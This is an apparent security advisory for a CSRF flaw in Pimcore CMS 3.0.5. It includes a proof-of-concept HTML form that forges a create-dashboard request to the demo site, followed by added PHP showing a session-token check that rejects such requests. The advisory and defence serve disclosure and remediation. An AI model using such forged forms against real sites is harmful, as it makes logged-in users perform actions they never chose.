# Affected software: Pimcore CMS
# Type of vulnerability: CSRF
# URL:pimcore.org
# Discovered by: provensec
# Website: provensec.com

# Version: 3.0.5 (Build: 3468)
# Proof of concept

There is no CSRF token on the add dashboard form.


<html>
  
  <body>
    <form action="http://demo.pimcore.org/admin/portal/create-dashboard">
      <input type="hidden" name="&#95;dc" value="1428652489594" />
      <input type="hidden" name="key" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
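
The form above carries only `_dc` and `key`, with nothing tied to the administrator's session. A server-side check of the following shape rejects such a request. This is an added example, not Pimcore's code or its actual fix; the function names and the `csrfToken` parameter are hypothetical.

```php
<?php
// Added example: generic session-bound CSRF check, not Pimcore's own code.
// csrf_issue_token(), csrf_request_allowed() and the "csrfToken" parameter
// name are hypothetical.

function csrf_issue_token(array &$session): string
{
    // One random token per session, kept server-side and embedded by the
    // admin UI into every state-changing request it sends.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_request_allowed(string $method, array $params, array $session): bool
{
    // State-changing actions must not be reachable via GET. The PoC form
    // has no method attribute, so a browser submits it as GET.
    if (strtoupper($method) !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $params['csrfToken'] ?? '';
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    // Constant-time comparison of the stored and the supplied token.
    return hash_equals($expected, $supplied);
}

// Constructed sample requests for the create-dashboard action.
$session = [];
$token   = csrf_issue_token($session);

$forged = ['_dc' => '1428652489594', 'key' => 'test']; // parameters from the PoC form
$legit  = ['key' => 'test', 'csrfToken' => $token];    // same action, token included

foreach ([['GET', $forged], ['POST', $forged], ['POST', $legit]] as [$method, $params]) {
    $verdict = csrf_request_allowed($method, $params, $session) ? 'accepted' : 'rejected';
    echo $method, ' ', json_encode($params), ' => ', $verdict, PHP_EOL;
}
```

Only the request that carries the session's token over POST is accepted; the cross-site form cannot supply that value because the attacker's page cannot read it.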